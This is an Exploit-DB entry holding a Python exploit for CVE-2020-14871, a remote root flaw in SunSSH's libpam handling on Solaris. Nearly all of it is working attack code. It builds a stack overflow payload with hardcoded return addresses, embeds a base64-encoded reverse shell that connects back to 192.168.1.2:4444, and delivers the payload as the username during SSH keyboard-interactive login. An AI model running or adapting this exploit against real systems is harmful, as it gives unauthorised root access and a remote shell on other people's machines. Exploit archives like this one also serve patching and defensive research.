Solaris SunSSH 11.0 x86 - libpam Remote Root (2)

EDB-ID:

49896


Author:

legend

Type:

remote


Platform:

Solaris

Date:

2021-05-21


# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
# Original Exploit Author: Hacker Fantastic
# Metasploit Module Author: wvu 
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
# Version: 10
# Tested on: SunOS solaris 10
# CVE: CVE-2020-14871
# Ported By: legend

import socket
import paramiko
from time import sleep

payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
payload+=b"python${IFS}-c${IFS}\""

# msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))"
payload+=b"\""

print("Length => %d" % (len(payload)))
def inter_handler(title, instructions, prompt_list):
    resp = []  #Initialize the response container
    for pr in prompt_list:
        print(pr)
        if pr[0].startswith('Please enter user name:'):
            sleep(10) 
            resp.append(payload)
            print("Your payload is sended check your nc")
    return tuple(resp)

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.2", 22))
ts = paramiko.Transport(sock)
ts.start_client(timeout=10)
ts.auth_interactive(username="", handler=inter_handler)